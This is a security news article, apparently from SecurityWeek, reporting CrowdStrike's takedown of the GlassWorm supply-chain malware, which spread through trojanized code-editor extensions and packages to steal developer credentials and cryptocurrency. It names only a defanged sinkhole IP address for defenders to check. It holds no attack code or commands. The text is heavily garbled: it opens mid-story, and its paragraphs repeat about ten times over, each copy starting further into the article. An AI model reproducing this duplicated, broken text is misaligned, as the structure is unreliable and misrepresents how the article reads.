By taking down all four channels at the same time, the cybersecurity firms severed the operators’ access to the infected machines and their ability to deliver new instructions.First spotted in October 2025, GlassWorm has been relying on Unicode variation selectors to hide its code in code editors and make it invisible to the human eye.The self-propagating malware was initially distributed via trojanized Visual Studio extensions via the OpenVSX marketplace. In November, however, it also emerged on GitHub.In 2026, GlassWorm attacks continued to target VS developers and other open source software ecosystems. In March, multiple Python projects were compromised.“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
First spotted in October 2025, GlassWorm has been relying on Unicode variation selectors to hide its code in code editors and make it invisible to the human eye.The self-propagating malware was initially distributed via trojanized Visual Studio extensions via the OpenVSX marketplace. In November, however, it also emerged on GitHub.In 2026, GlassWorm attacks continued to target VS developers and other open source software ecosystems. In March, multiple Python projects were compromised.“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
The self-propagating malware was initially distributed via trojanized Visual Studio extensions via the OpenVSX marketplace. In November, however, it also emerged on GitHub.In 2026, GlassWorm attacks continued to target VS developers and other open source software ecosystems. In March, multiple Python projects were compromised.“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
In 2026, GlassWorm attacks continued to target VS developers and other open source software ecosystems. In March, multiple Python projects were compromised.“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise.According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections.“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.Related:‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedRelated:Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’Related:US Disrupts Russian Espionage Operation Involving Hacked Routers and DNS HijackingRelated:Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
Source: SecurityWeek
